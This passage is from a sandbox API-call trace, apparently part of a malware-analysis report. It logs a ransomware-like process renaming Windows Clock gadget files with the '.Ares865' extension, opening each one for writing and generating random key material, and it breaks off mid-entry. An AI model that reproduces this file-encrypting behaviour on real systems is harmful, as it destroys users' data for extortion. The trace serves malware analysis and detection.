Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.Ares865") returned 94 [0119.414] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png.ares865"), dwFlags=0x1) returned 1 [0119.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23101) returned 1 [0119.418] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.419] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.419] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.424] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.424] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.425] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.Ares865") returned 83 [0119.425] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png.ares865"), dwFlags=0x1) returned 1 [0119.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.427] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19515) returned 1 [0119.427] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.428] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.428] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.446] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.447] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.447] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.Ares865") returned 87 [0119.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png.ares865"), dwFlags=0x1) returned 1 [0119.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3019) returned 1 [0119.450] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.451] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.451] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.454] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.455] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.455] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.Ares865") returned 85 [0119.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png.ares865"), dwFlags=0x1) returned 1 [0119.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=351) returned 1 [0119.458] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.459] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.459] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.465] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.466] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.466] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.466] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.Ares865") returned 85 [0119.466] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png.ares865"), dwFlags=0x1) returned 1 [0119.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=361) returned 1 [0119.468] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.469] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.469] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.473] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.473] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.474] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.Ares865") returned 85 [0119.474] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png.ares865"), dwFlags=0x1) returned 1 [0119.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.476] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3000) returned 1 [0119.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.477] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.477] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.483] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.483] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.483] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.484] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.Ares865") returned 92 [0119.484] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png.ares865"), dwFlags=0x1) returned 1 [0119.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.485] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21381) returned 1 [0119.486] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.486] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.486] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.490] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.491] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.491] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" [0119.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.Ares865") returned 84 [0119.493] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html.ares865"), dwFlags=0x1) returned 1 [0119.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4172) returned 1 [0119.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.496] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.496] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.498] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.499] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.499] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.499] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.Ares865") returned 87 [0119.500] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html.ares865"), dwFlags=0x1) returned 1 [0119.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10260) returned 1 [0119.501] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.502] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.502] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.508] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.508] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.508] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.509] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js" [0119.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.Ares865") returned 85 [0119.509] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js.ares865"), dwFlags=0x1) returned 1 [0119.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.511] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18042) returned 1 [0119.512] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.512] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.512] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.519] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.519] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.519] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.520] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js.Ares865") returned 88 [0119.520] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\settings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\settings.js.ares865"), dwFlags=0x1) returned 1 [0119.530] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\settings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.530] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23630) returned 1 [0119.530] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.531] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.531] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.535] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.535] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.535] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js.Ares865") returned 89 [0119.535] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\timezones.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\timezones.js.ares865"), dwFlags=0x1) returned 1 [0119.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\timezones.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9612) returned 1 [0119.539] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.540] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.540] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.544] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.544] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.545] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" [0119.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.Ares865") returned 87 [0119.546] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css.ares865"), dwFlags=0x1) returned 1 [0119.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=674) returned 1 [0119.548] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.549] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.549] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.551] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.552] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.552] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css.Ares865") returned 90 [0119.552] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files 